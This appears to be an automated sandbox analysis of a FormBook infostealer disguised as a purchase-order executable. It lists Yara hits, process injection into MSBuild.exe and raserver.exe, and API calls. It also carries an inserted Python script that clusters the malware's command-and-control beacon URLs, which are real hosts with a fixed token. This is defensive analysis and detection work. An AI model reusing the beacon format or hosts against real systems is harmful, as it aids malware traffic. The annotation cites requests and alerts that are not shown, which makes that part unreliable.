Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 21 Nov 2020 08:24:27 GMT | Server: Apache/2.4.43 (Unix) | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
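The fifteen GET requests above share one shape: path /igqu/, two query parameters named 1b3H_Ni and JXhpvv, the JXhpvv value OXXTgtL8CzU0PRx0 identical in every request, no User-Agent header (the "HTTP GET or POST without a user agent" signature in the list), Connection: close, and fourteen different Host values that ordinary web servers answered with 403 or 404 (the Snort ATTACK-RESPONSES alerts and the Apache 404 response). Blocking the fourteen domains is the weakest response to this, since most of them are evidently not the live C2. The script below is an added example, not part of the report: it transcribes five of the requests plus one constructed benign request into a reduced record form and clusters them by URL shape, reporting any cluster that spans several hosts with no User-Agent and a query parameter whose value never changes across hosts.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed request records: five transcribed from the HTTP traffic above,
# plus one benign request (host and URI made up) for contrast. Only the fields
# the detection uses are kept; ua=None means no User-Agent header was sent.
REQUESTS = [
    {"host": "www.ariasu-nakanokaikei.com", "ua": None,
     "uri": "/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0"},
    {"host": "www.allan-wren.com", "ua": None,
     "uri": "/igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0"},
    {"host": "www.theoutdoorbed.com", "ua": None,
     "uri": "/igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0"},
    {"host": "www.forbigdogs.com", "ua": None,
     "uri": "/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0"},
    {"host": "www.allmm.info", "ua": None,
     "uri": "/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0"},
    # constructed benign request: ordinary browser traffic with a User-Agent
    {"host": "www.example.com", "ua": "Mozilla/5.0 (constructed)", "uri": "/index.html?lang=en"},
]


def shape(uri):
    """URL shape = (path, sorted parameter names); the values are returned separately."""
    parts = urlsplit(uri)
    params = parse_qsl(parts.query, keep_blank_values=True)
    return parts.path, tuple(sorted(k for k, _ in params)), dict(params)


def find_c2_clusters(requests, min_hosts=3):
    """Group requests by URL shape and report shapes that fan out across many hosts.

    A cluster is reported when at least min_hosts distinct Host values share the
    same path and parameter names. For each cluster the result records whether
    every request lacked a User-Agent and which parameters kept one constant
    value across all hosts (a campaign token rather than per-request data)."""
    groups = defaultdict(list)
    for r in requests:
        path, names, params = shape(r["uri"])
        groups[(path, names)].append((r["host"], params, r["ua"]))
    findings = []
    for (path, names), rows in groups.items():
        hosts = {host for host, _, _ in rows}
        if len(hosts) < min_hosts:
            continue
        constant = {n for n in names if len({p.get(n) for _, p, _ in rows}) == 1}
        findings.append({
            "path": path,
            "params": names,
            "hosts": len(hosts),
            "no_user_agent": all(ua is None for _, _, ua in rows),
            "constant_params": constant,
        })
    return findings


if __name__ == "__main__":
    for f in find_c2_clusters(REQUESTS):
        print(f"{f['path']} params={f['params']} hosts={f['hosts']} "
              f"no_ua={f['no_user_agent']} constant={sorted(f['constant_params'])}")
```

The useful output is the shape, not the host list: `/igqu/` with parameters `1b3H_Ni` and `JXhpvv`, the latter constant, from a client sending no User-Agent, is what to hunt for in proxy logs, and it keeps working when the next sample rotates its domain list.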

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417BA0 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417C50 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417CD0 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417D80 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417C4C NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00417CCA NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015299A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015298F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015295D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015297A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015296E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015299D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152B040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015298A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152AD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529520 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015295F0 NtQueryInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529770 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A770 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529760 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0152A710 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529730 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529650 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529670 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01529610 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015296D0 NtCreateKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048195D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048196D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048199A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048195F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819560 NtWriteFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048197A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819760 NtOpenProcess
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A770 NtOpenThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048198A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048198F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_048199D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A10 NtQuerySection
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819A20 NtResumeThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0481A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_04819B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677BA0 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677C50 NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677CD0 NtClose
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677D80 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677C4C NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00677CCA NtClose
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_0130EB70
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_0130EB60
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_0130CB5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041C16E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00408A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00408A3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041C52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00402D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041BF03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01504120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015099BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015BE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015120A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015ADBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015923E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0159FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01512581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015AD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A4496
